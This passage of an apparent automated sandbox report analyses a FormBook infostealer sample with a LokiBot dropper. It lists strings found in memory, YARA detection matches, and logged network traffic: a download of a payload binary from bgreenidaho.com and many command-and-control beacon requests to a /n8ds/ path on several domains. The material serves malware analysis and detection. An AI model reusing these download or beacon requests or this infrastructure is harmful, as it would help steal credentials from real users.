        Source: explorer.exe, 0000000D.00000000.26113659674.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25943862085.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896429227.0000000011224000.00000004.00000001.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://windows.msn.com:443/shell
        Source: explorer.exe, 0000000D.00000000.25986092319.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26102364486.000000000D715000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887866745.000000000D715000.00000004.00000001.sdmpString found in binary or memory: https://word.office.com
        Source: explorer.exe, 0000000D.00000000.25895579736.000000001114E000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26113659674.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25943862085.0000000011224000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25942840158.000000001114E000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.26112555996.000000001114E000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25896429227.0000000011224000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://www.hostgator.com.br
        Source: explorer.exe, 0000000D.00000000.26101409229.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887040916.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25932474197.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25985258552.000000000D658000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehp
        Source: explorer.exe, 0000000D.00000000.26101409229.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25887040916.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25932474197.000000000D658000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25985258552.000000000D658000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpg
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/?ocid=iehpyu1SPS
        Source: explorer.exe, 0000000D.00000000.25946934247.0000000011792000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898877530.0000000011792000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
        Source: explorer.exe, 0000000D.00000000.25999514527.00000000116D4000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25898197362.00000000116D4000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpm
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
        Source: explorer.exe, 0000000D.00000000.26088631938.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25877132916.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25972354518.00000000059B9000.00000004.00000001.sdmp, explorer.exe, 0000000D.00000000.25921357742.00000000059B9000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.unitedmetal-saudi.com
        Source: ipconfig.exe, 0000000E.00000002.30170828015.00000000040B2000.00000004.00020000.sdmp, firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
        Source: firefox.exe, 00000018.00000000.28530738113.00000000224A2000.00000004.00020000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
        Source: unknownHTTP traffic detected: POST /n8ds/ HTTP/1.1Host: www.mummymotors.comConnection: closeContent-Length: 131142Cache-Control: no-cacheOrigin: http://www.mummymotors.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.mummymotors.com/n8ds/Accept-Language: en-USAccept-Encoding: gzip, deflate
        Source: unknownDNS traffic detected: queries for: bgreenidaho.com
        Source: global trafficHTTP traffic detected: GET /Newfile/bin_UFDek247.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: bgreenidaho.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=JCnWpsMsE1LhJoPwCBaMQ23aQlJM1lBrGqYKhWEiZBh+41Ky2Bnma6QhJDV2RS4wXNsD&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.diggingquartz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=tD0293ekre+uqVzNRybWeIsGKZg60tBQR/GVivWOVJ5sXdl+h0HHf0FfKjbRE++mAfFR&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.effective.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=x7rWj66roGKEZAObj73O6eF88ujFBI8nvGjdodwL/UKuZeUM1FVQm65GonJ0KgAiqF14 HTTP/1.1Host: www.gdav130.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=3XBGTKX1IO0m2ps0OCefiLpUWq3mTk3XjxcX7A828ivUAOqw78DSKkuwDvhVWOojGfRi&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.dietatrintadias.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1Host: www.mummymotors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF HTTP/1.1Host: www.fatima2021.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF HTTP/1.1Host: www.talkingpoint.toursConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&E0Dpk=l8hHaF HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=Jv+KBR9TMcpwNTBIzPqg8qhOh/MOyYoQ7cFMdSYE1xgXhr2Qjx48HBx6QPFrGWZkW9Pq&E0Dpk=l8hHaF HTTP/1.1Host: www.palmasdelmarcondos.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&3fVD2v=9rZXD0c8pBS HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=prkX5vIEewOKdb4uapSD5zP9OaJ72kAqHOW75HdD0V+URkfePb3G34/1ninLd5DC/lUo&y6AH=yHQDs HTTP/1.1Host: www.yghdlhax.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=/jsG/ERKVryn6C207o/LcEim1QqN5MyxJsKeesIBefptic1Rr4NlAfFwHDf6m9wpfQov&y6AH=yHQDs HTTP/1.1Host: www.littlefishth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&y6AH=yHQDs HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&y6AH=yHQDs HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&y6AH=yHQDs HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?B85P=7nvHaF&lZOD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=YRa5YekRSAscu3KREIVoiFdBwJD7Q6+kwilTnNtYZuu2w/klC7MTP9008fix5v3TRxpN&B85P=7nvHaF HTTP/1.1Host: www.reliablehomesellers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?B85P=7nvHaF&lZOD=xt9lVamh+l2tCJEzLraep2wr4mh9RzdETgdkMDxktciC9JfbtbQO2x805OfzVZ2kHZ4c HTTP/1.1Host: www.dif-directory.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /n8ds/?lZOD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&B85P=7nvHaF HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49807 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.124.109.2:443 -> 192.168.11.20:49845 version: TLS 1.2

        E-Banking Fraud:

        Yara detected FormBook

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000018.00000002.28535963674.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30167876029.0000000003877000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30160230077.0000000002AC9000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000E.00000002.30163222370.0000000003591000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001C.00000002.30154030326.00000000007D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001C.00000002.30161247591.0000000002ED2000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30170515202.0000000003F37000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.30169443980.0000000004F37000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000018.00000000.28477585132.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
        Source: BL_CI_PL.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001C.00000002.30158475772.0000000002D10000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000018.00000002.28535963674.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001D.00000002.30162719326.00000000046B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001C.00000002.30167876029.0000000003877000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30160230077.0000000002AC9000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000001C.00000002.30159261353.0000000002D40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000001D.00000002.30162421459.0000000004680000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
